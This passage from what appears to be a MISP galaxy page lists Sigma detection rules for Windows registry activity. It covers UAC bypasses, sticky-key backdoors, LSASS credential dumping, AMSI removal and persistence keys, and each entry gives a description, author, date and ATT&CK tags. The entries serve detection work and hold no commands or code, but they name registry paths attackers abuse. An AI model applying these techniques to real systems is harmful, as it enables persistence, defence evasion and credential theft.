level critical
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

UAC Bypass Via Wsreset

Detects an unfixed UAC bypass method on Windows 10. WSReset.exe is a file associated with the Windows Store; it will run a binary file referenced from a low-privilege registry location.

Internal MISP references

UUID 6ea3bf32-9680-422d-9f50-e90716b12a66 which can be used as unique global reference for UAC Bypass Via Wsreset in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Dmitry Uchakin
creation_date 2020/10/07
falsepositive ['Unknown']
filename registry_event_bypass_via_wsreset.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

NetNTLM Downgrade Attack - Registry

Detects a NetNTLM downgrade attack

Internal MISP references

UUID d67572a0-e2ec-45d6-b8db-c100d14b8ef2 which can be used as unique global reference for NetNTLM Downgrade Attack - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), wagga
creation_date 2018/03/20
falsepositive ['Unknown']
filename registry_event_net_ntlm_downgrade.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Sticky Key Like Backdoor Usage - Registry

Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen

Internal MISP references

UUID baca5663-583c-45f9-b5dc-ea96a22ce542 which can be used as unique global reference for Sticky Key Like Backdoor Usage - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
creation_date 2018/03/15
falsepositive ['Unlikely']
filename registry_event_stickykey_like_backdoor.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1546.008', 'car.2014-11-003', 'car.2014-11-008']
Related clusters

To see the related clusters, click here.

New DLL Added to AppInit_DLLs Registry Key

DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll

Internal MISP references

UUID 4f84b697-c9ed-4420-8ab5-e09af5b2345d which can be used as unique global reference for New DLL Added to AppInit_DLLs Registry Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community, Tim Shelton
creation_date 2019/10/25
falsepositive ['Unknown']
filename registry_event_new_dll_added_to_appinit_dlls_registry_key.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1546.010']
Related clusters

To see the related clusters, click here.

Narrator's Feedback-Hub Persistence

Detects abuse of the Windows 10 Narrator's Feedback-Hub for persistence

Internal MISP references

UUID f663a6d9-9d1b-49b8-b2b1-0637914d199a which can be used as unique global reference for Narrator's Feedback-Hub Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dmitriy Lifanov, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename registry_event_narrator_feedback_persistance.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

OilRig APT Registry Persistence

Detects OilRig registry persistence as reported by Nyotron in their March 2018 report

Internal MISP references

UUID 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 which can be used as unique global reference for OilRig APT Registry Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
creation_date 2018/03/23
falsepositive ['Unlikely']
filename registry_event_apt_oilrig_mar18.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.g0049', 'attack.t1053.005', 'attack.s0111', 'attack.t1543.003', 'attack.defense_evasion', 'attack.t1112', 'attack.command_and_control', 'attack.t1071.004']
Related clusters

To see the related clusters, click here.

Registry Entries For Azorult Malware

Detects the presence of a registry key created during Azorult execution

Internal MISP references

UUID f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7 which can be used as unique global reference for Registry Entries For Azorult Malware in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick
creation_date 2020/05/08
falsepositive ['Unknown']
filename registry_event_mal_azorult.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.execution', 'attack.t1112']
Related clusters

To see the related clusters, click here.

CMSTP Execution Registry Event

Detects various indicators of Microsoft Connection Manager Profile Installer execution

Internal MISP references

UUID b6d235fc-1d38-4b12-adbe-325f06728f37 which can be used as unique global reference for CMSTP Execution Registry Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nik Seetharaman
creation_date 2018/07/16
falsepositive ['Legitimate CMSTP use (unlikely in modern enterprise environments)']
filename registry_event_cmstp_execution_by_registry.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218.003', 'attack.g0069', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

Atbroker Registry Change

Detects the creation or modification of Assistive Technology applications, and persistence through the use of 'at'

Internal MISP references

UUID 9577edbb-851f-4243-8c91-1d5b50c1a39b which can be used as unique global reference for Atbroker Registry Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mateusz Wydra, oscd.community
creation_date 2020/10/13
falsepositive ['Creation of non-default, legitimate at usage']
filename registry_event_susp_atbroker_change.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

Wdigest CredGuard Registry Modification

Detects potentially malicious modification of the IsCredGuardEnabled property value under HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Credential Guard on a system. This is usually combined with UseLogonCredential to manipulate credential caching.

Internal MISP references

UUID 1a2d6c47-75b0-45bd-b133-2c0be75349fd which can be used as unique global reference for Wdigest CredGuard Registry Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2019/08/25
falsepositive ['Unknown']
filename registry_event_disable_wdigest_credential_guard.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

WINEKEY Registry Modification

Detects potential malicious modification of run keys by winekey or team9 backdoor

Internal MISP references

UUID b98968aa-dbc0-4a9c-ac35-108363cbf8d5 which can be used as unique global reference for WINEKEY Registry Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72
creation_date 2020/10/30
falsepositive ['Unknown']
filename registry_event_runkey_winekey.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

HybridConnectionManager Service Installation - Registry

Detects the installation of the Azure Hybrid Connection Manager service, which allows remote code execution from an Azure function.

Internal MISP references

UUID ac8866c7-ce44-46fd-8c17-b24acff96ca8 which can be used as unique global reference for HybridConnectionManager Service Installation - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2021/04/12
falsepositive ['Unknown']
filename registry_event_hybridconnectionmgr_svc_installation.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.resource_development', 'attack.t1608']
Related clusters

To see the related clusters, click here.

Esentutl Volume Shadow Copy Service Keys

Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.

Internal MISP references

UUID 5aad0995-46ab-41bd-a9ff-724f41114971 which can be used as unique global reference for Esentutl Volume Shadow Copy Service Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/20
falsepositive ['Unknown']
filename registry_event_esentutl_volume_shadow_copy_service_keys.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Shell Open Registry Keys Manipulation

Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)

Internal MISP references

UUID 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 which can be used as unique global reference for Shell Open Registry Keys Manipulation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename registry_event_shell_open_keys_manipulation.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'attack.t1546.001']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Via LSASS SilentProcessExit Technique

Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process

Internal MISP references

UUID 55e29995-75e7-451a-bef0-6225e2f13597 which can be used as unique global reference for Potential Credential Dumping Via LSASS SilentProcessExit Technique in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/02/26
falsepositive ['Unlikely']
filename registry_event_silentprocessexit_lsass.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Pandemic Registry Key

Detects the Pandemic Windows implant

Internal MISP references

UUID 47e0852a-cf81-4494-a8e6-31864f8c86ed which can be used as unique global reference for Pandemic Registry Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/06/01
falsepositive ['Unknown']
filename registry_event_apt_pandemic.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Terminal Server Client Connection History Cleared - Registry

Detects the deletion of registry keys containing the MSTSC connection history

Internal MISP references

UUID 07bdd2f5-9c58-4f38-aec8-e101bb79ef8d which can be used as unique global reference for Terminal Server Client Connection History Cleared - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/10/19
falsepositive ['Unknown']
filename registry_delete_mstsc_history_cleared.yml
level high
logsource.category registry_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Removal Of SD Value to Hide Schedule Task - Registry

Detects the removal of the SD (Security Descriptor) value under the \Schedule\TaskCache\Tree registry key to hide a scheduled task. This technique is used by the Tarrask malware

Internal MISP references

UUID acd74772-5f88-45c7-956b-6a7b36c294d2 which can be used as unique global reference for Removal Of SD Value to Hide Schedule Task - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S
creation_date 2022/04/15
falsepositive ['Unknown']
filename registry_delete_schtasks_hide_task_via_sd_value_removal.yml
level medium
logsource.category registry_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Removal Of AMSI Provider Registry Keys

Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.

Internal MISP references

UUID 41d1058a-aea7-4952-9293-29eaaf516465 which can be used as unique global reference for Removal Of AMSI Provider Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/06/07
falsepositive ['Unlikely']
filename registry_delete_removal_amsi_registry_key.yml
level high
logsource.category registry_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Folder Removed From Exploit Guard ProtectedFolders List - Registry

Detects the removal of folders from the "ProtectedFolders" list of Exploit Guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside a protected folder

Internal MISP references

UUID 272e55a4-9e6b-4211-acb6-78f51f0b1b40 which can be used as unique global reference for Folder Removed From Exploit Guard ProtectedFolders List - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Legitimate administrators removing applications (should always be investigated)']
filename registry_delete_exploit_guard_protected_folders.yml
level high
logsource.category registry_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Removal Of Index Value to Hide Schedule Task - Registry

Detects when the "Index" value of a scheduled task is removed or deleted from the registry, which effectively hides the task from tooling such as "schtasks /query"

Internal MISP references

UUID 526cc8bc-1cdc-48ad-8b26-f19bff969cec which can be used as unique global reference for Removal Of Index Value to Hide Schedule Task - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/26
falsepositive ['Unknown']
filename registry_delete_schtasks_hide_task_via_index_value_removal.yml
level medium
logsource.category registry_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Removal of Potential COM Hijacking Registry Keys

Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.

Internal MISP references

UUID 96f697b0-b499-4e5d-9908-a67bec11cdb6 which can be used as unique global reference for Removal of Potential COM Hijacking Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered']
filename registry_delete_removal_com_hijacking_registry_key.yml
level medium
logsource.category registry_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Ursnif Malware Activity - Registry

Detects registry keys related to Ursnif malware.

Internal MISP references

UUID 21f17060-b282-4249-ade0-589ea3591558 which can be used as unique global reference for Potential Ursnif Malware Activity - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author megan201296
creation_date 2019/02/13
falsepositive ['Unknown']
filename registry_add_malware_ursnif.yml
level high
logsource.category registry_add
logsource.product windows
tags ['attack.execution', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential COM Object Hijacking Via TreatAs Subkey - Registry

Detects COM object hijacking via TreatAs subkey

Internal MISP references

UUID 9b0f8a61-91b2-464f-aceb-0527e0a45020 which can be used as unique global reference for Potential COM Object Hijacking Via TreatAs Subkey - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kutepov Anton, oscd.community
creation_date 2019/10/23
falsepositive ['Maybe some system utilities in rare cases use linking keys for backward compatibility']
filename registry_add_persistence_com_key_linking.yml
level medium
logsource.category registry_add
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Disk Cleanup Handler - Registry

Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.

Internal MISP references

UUID d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a which can be used as unique global reference for Potential Persistence Via Disk Cleanup Handler - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Legitimate new entry added by windows']
filename registry_add_persistence_disk_cleanup_handler_entry.yml
level medium
logsource.category registry_add
logsource.product windows
tags ['attack.persistence']

PUA - Sysinternal Tool Execution - Registry

Detects the execution of a Sysinternals tool via the creation of the "accepteula" registry key.

Internal MISP references

UUID 25ffa65d-76d8-4da5-a832-3f2b0136e133 which can be used as unique global reference for PUA - Sysinternal Tool Execution - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2017/08/28
falsepositive ['Legitimate use of SysInternals tools', 'Programs that use the same Registry Key']
filename registry_add_pua_sysinternals_execution_via_eula.yml
level low
logsource.category registry_add
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']

Potential NetWire RAT Activity - Registry

Detects registry keys related to NetWire RAT

Internal MISP references

UUID 1d218616-71b0-4c40-855b-9dbe75510f7f which can be used as unique global reference for Potential NetWire RAT Activity - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock
creation_date 2021/10/07
falsepositive ['Unknown']
filename registry_add_malware_netwire.yml
level high
logsource.category registry_add
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Suspicious Execution Of Renamed Sysinternals Tools - Registry

Detects the creation of the "accepteula" registry key associated with the Sysinternals tools by an executable with an unexpected name (e.g. a renamed Sysinternals tool).

Internal MISP references

UUID f50f3c09-557d-492d-81db-9064a8d4e211 which can be used as unique global reference for Suspicious Execution Of Renamed Sysinternals Tools - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Unlikely']
filename registry_add_pua_sysinternals_renamed_execution_via_eula.yml
level high
logsource.category registry_add
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']

Potential Persistence Via New AMSI Providers - Registry

Detects when an attacker registers a new AMSI provider in order to achieve persistence

Internal MISP references

UUID 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 which can be used as unique global reference for Potential Persistence Via New AMSI Providers - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Legitimate security products adding their own AMSI providers. Filter these according to your environment']
filename registry_add_persistence_amsi_providers.yml
level high
logsource.category registry_add
logsource.product windows
tags ['attack.persistence']

Potential Persistence Via Logon Scripts - Registry

Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors

Internal MISP references

UUID 9ace0707-b560-49b8-b6ca-5148b42f39fb which can be used as unique global reference for Potential Persistence Via Logon Scripts - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Ueltschi (@c_APT_ure)
creation_date 2019/01/12
falsepositive ['Investigate the contents of the "UserInitMprLogonScript" value to determine if the added script is legitimate']
filename registry_add_persistence_logon_scripts_userinitmprlogonscript.yml
level medium
logsource.category registry_add
logsource.product windows
tags ['attack.t1037.001', 'attack.persistence', 'attack.lateral_movement']

PUA - Sysinternals Tools Execution - Registry

Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.

Internal MISP references

UUID c7da8edc-49ae-45a2-9e61-9fd860e4e73d which can be used as unique global reference for PUA - Sysinternals Tools Execution - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment']
filename registry_add_pua_sysinternals_susp_execution_via_eula.yml
level medium
logsource.category registry_add
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']

Potential Persistence Via Netsh Helper DLL - Registry

Detects changes to the Netsh registry key that add a new DLL value. Such a change might indicate a persistence attempt via a malicious Netsh helper DLL.

Internal MISP references

UUID c90362e0-2df3-4e61-94fe-b37615814cb1 which can be used as unique global reference for Potential Persistence Via Netsh Helper DLL - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Anish Bogati
creation_date 2023/11/28
falsepositive ['Legitimate helper added by different programs and the OS']
filename registry_set_netsh_helper_dll_potential_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.007']

New DNS ServerLevelPluginDll Installed

Detects the installation of a DNS plugin DLL via the ServerLevelPluginDll registry parameter, which can be used to execute code in the context of the DNS server (a service restart is required).

Internal MISP references

UUID e61e8a88-59a9-451c-874e-70fcc9740d67 which can be used as unique global reference for New DNS ServerLevelPluginDll Installed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/08
falsepositive ['Unknown']
filename registry_set_dns_server_level_plugin_dll.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002', 'attack.t1112']

Execution DLL of Choice Using WAB.EXE

Detects when the DLL path written in the registry differs from the default one. When launched, WAB.exe tries to load the DLL from the registry.

Internal MISP references

UUID fc014922-5def-4da9-a0fc-28c973f41bfb which can be used as unique global reference for Execution DLL of Choice Using WAB.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020/10/13
falsepositive ['Unknown']
filename registry_set_wab_dllpath_reg_change.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

MaxMpxCt Registry Value Changed

Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.

Internal MISP references

UUID 0e6a9e62-627e-496c-aef5-bfa39da29b5e which can be used as unique global reference for MaxMpxCt Registry Value Changed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/03/19
falsepositive ['Unknown']
filename registry_set_optimize_file_sharing_network.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.005']

Tamper With Sophos AV Registry Keys

Detects tampering attempts against Sophos AV functionality via registry key modification

Internal MISP references

UUID 9f4662ac-17ca-43aa-8f12-5d7b989d0101 which can be used as unique global reference for Tamper With Sophos AV Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/02
falsepositive ['Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate']
filename registry_set_sophos_av_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Potential Persistence Via App Paths Default Property

Detects changes to the "Default" property of keys located under the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry key, which might be used as a method of persistence. The entries found under App Paths are used primarily for two purposes: first, to map an application's executable file name to that file's fully qualified path; second, to prepend information to the PATH environment variable on a per-application, per-process basis.

Internal MISP references

UUID 707e097c-e20f-4f67-8807-1f72ff4500d6 which can be used as unique global reference for Potential Persistence Via App Paths Default Property in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/10
falsepositive ['Legitimate applications registering their binary from one of the suspicious locations mentioned above (tune it)']
filename registry_set_persistence_app_paths.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.012']

Activate Suppression of Windows Security Center Notifications

Detects Notification_Suppress being set to 1, which disables Windows Security Center notifications

Internal MISP references

UUID 0c93308a-3f1b-40a9-b649-57ea1a1c1d63 which can be used as unique global reference for Activate Suppression of Windows Security Center Notifications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Unknown']
filename registry_set_suppress_defender_notifications.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Potential Persistence Via CHM Helper DLL

Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence

Internal MISP references

UUID 976dd1f2-a484-45ec-aa1d-0e87e882262b which can be used as unique global reference for Potential Persistence Via CHM Helper DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Unknown']
filename registry_set_persistence_chm.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

New ODBC Driver Registered

Detects the registration of a new ODBC driver.

Internal MISP references

UUID 3390fbef-c98d-4bdd-a863-d65ed7c610dd which can be used as unique global reference for New ODBC Driver Registered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/23
falsepositive ['Likely']
filename registry_set_odbc_driver_registered.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Potential Persistence Using DebugPath

Detects potential persistence using Appx DebugPath

Internal MISP references

UUID df4dc653-1029-47ba-8231-3c44238cc0ae which can be used as unique global reference for Potential Persistence Using DebugPath in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/07/27
falsepositive ['Unknown']
filename registry_set_persistence_appx_debugger.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']

Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG

Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".

Internal MISP references

UUID 7021255e-5db3-4946-a8b9-0ba7a4644a69 which can be used as unique global reference for Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/08/02
falsepositive ['Unknown']
filename registry_set_provisioning_command_abuse.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

CrashControl CrashDump Disabled

Detects disabling the CrashDump per registry (as used by HermeticWiper)

Internal MISP references

UUID 2ff692c2-4594-41ec-8fcb-46587de769e0 which can be used as unique global reference for CrashControl CrashDump Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2022/02/24
falsepositive ['Legitimate disabling of crashdumps']
filename registry_set_crashdump_disabled.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.t1564', 'attack.t1112']

Outlook EnableUnsafeClientMailRules Setting Enabled - Registry

Detects an attacker trying to enable the Outlook security setting "EnableUnsafeClientMailRules", which allows Outlook to run applications or execute macros

Internal MISP references

UUID 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 which can be used as unique global reference for Outlook EnableUnsafeClientMailRules Setting Enabled - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/08
falsepositive ['Unknown']
filename registry_set_office_outlook_enable_unsafe_client_mail_rules.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Disable UAC Using Registry

Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0

Internal MISP references

UUID 48437c39-9e5f-47fb-af95-3d663c3f2919 which can be used as unique global reference for Disable UAC Using Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/05
falsepositive ['Unknown']
filename registry_set_disable_uac_registry.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1548.002']

Registry Explorer Policy Modification

Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)

Internal MISP references

UUID 1c3121ed-041b-4d97-a075-07f54f20fb4a which can be used as unique global reference for Registry Explorer Policy Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/18
falsepositive ['Legitimate admin script']
filename registry_set_set_nopolicies_user.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Potential PendingFileRenameOperations Tamper

Detects changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious image locations to stage currently used files for rename after reboot.

Internal MISP references

UUID 4eec988f-7bf0-49f1-8675-1e6a510b3a2a which can be used as unique global reference for Potential PendingFileRenameOperations Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/27
falsepositive ['Installers and updaters may set currently in use files for rename after a reboot.']
filename registry_set_susp_pendingfilerenameoperations.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']

Potential Attachment Manager Settings Associations Tamper

Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)

Internal MISP references

UUID a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47 which can be used as unique global reference for Potential Attachment Manager Settings Associations Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/01
falsepositive ['Unlikely']
filename registry_set_policies_associations_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

CurrentVersion NT Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

